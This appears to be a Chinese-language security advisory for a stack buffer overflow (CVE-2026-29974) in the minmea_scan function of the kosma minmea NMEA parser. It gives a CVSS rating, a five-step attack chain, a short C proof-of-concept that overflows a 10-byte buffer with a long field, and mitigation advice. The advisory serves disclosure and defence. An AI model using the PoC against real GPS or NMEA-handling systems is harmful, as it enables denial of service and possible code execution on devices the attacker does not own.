CVE-2026-29974: kosma minmea栈缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2026-29974

漏洞类型

栈缓冲区溢出

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

kosma minmea

漏洞概述

kosma minmea 0.3.0版本中存在安全漏洞。minmea_scan函数在处理格式说明符时，将NMEA字段数据复制到调用方提供的缓冲区时缺少大小参数，导致栈缓冲区溢出。攻击者利用此漏洞无需用户交互即可通过网络发送恶意数据，造成应用程序崩溃或服务拒绝。

技术细节

该漏洞位于minmea库的minmea_scan函数中。该函数用于解析NMEA协议数据，其设计允许通过格式说明符将字段值提取至用户提供的缓冲区。然而，该函数未对源数据长度及目标缓冲区大小进行边界检查。当应用程序使用minmea_scan处理来自不可信源的超长NMEA字段时，恶意数据会覆盖栈上的返回地址或其他敏感数据，导致控制流劫持或程序崩溃。根据CVSS 3.1向量，该漏洞主要表现为高可用性影响。

攻击链分析

STEP 1

1. 侦察

攻击者识别出目标系统正在使用kosma minmea库处理NMEA数据。

STEP 2

2. 构造载荷

攻击者构造包含超长字段的特制NMEA数据包，长度超过目标缓冲区大小。

STEP 3

3. 传递载荷

通过网络接口将恶意NMEA数据包发送给目标应用程序。

STEP 4

4. 触发溢出

目标应用程序调用minmea_scan函数处理数据，由于缺乏长度检查，发生栈缓冲区溢出。

STEP 5

5. 达成效果

应用程序崩溃（DoS），或在特定条件下执行任意代码。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "minmea.h"

// PoC for CVE-2026-29974
// Demonstrates stack buffer overflow in minmea_scan

int main() {
    // crafting a malicious NMEA sentence with a long field
    char malicious_nmea[512];
    memset(malicious_nmea, 'A', sizeof(malicious_nmea) - 1);
    malicious_nmea[sizeof(malicious_nmea) - 1] = '\0';
    
    // Example format expecting a string into a small buffer
    char buf[10]; 
    
    printf("Sending payload...\n");
    
    // The minmea_scan function copies data without checking size
    // This will overflow 'buf' and corrupt the stack
    int res = minmea_scan(malicious_nmea, "s", buf);
    
    if (res == 1) {
        printf("Parsing successful (unexpected)\n");
    } else {
        printf("Parsing failed\n");
    }
    
    return 0;
}

影响范围

kosma minmea 0.3.0

防御指南

临时缓解措施

建议开发者在集成minmea库时，在应用层对NMEA字段长度进行限制，确保单个字段长度不超过预期缓冲区大小。对于无法立即升级的系统，应在数据输入源头部署防火墙或过滤规则，丢弃异常长度的NMEA数据包。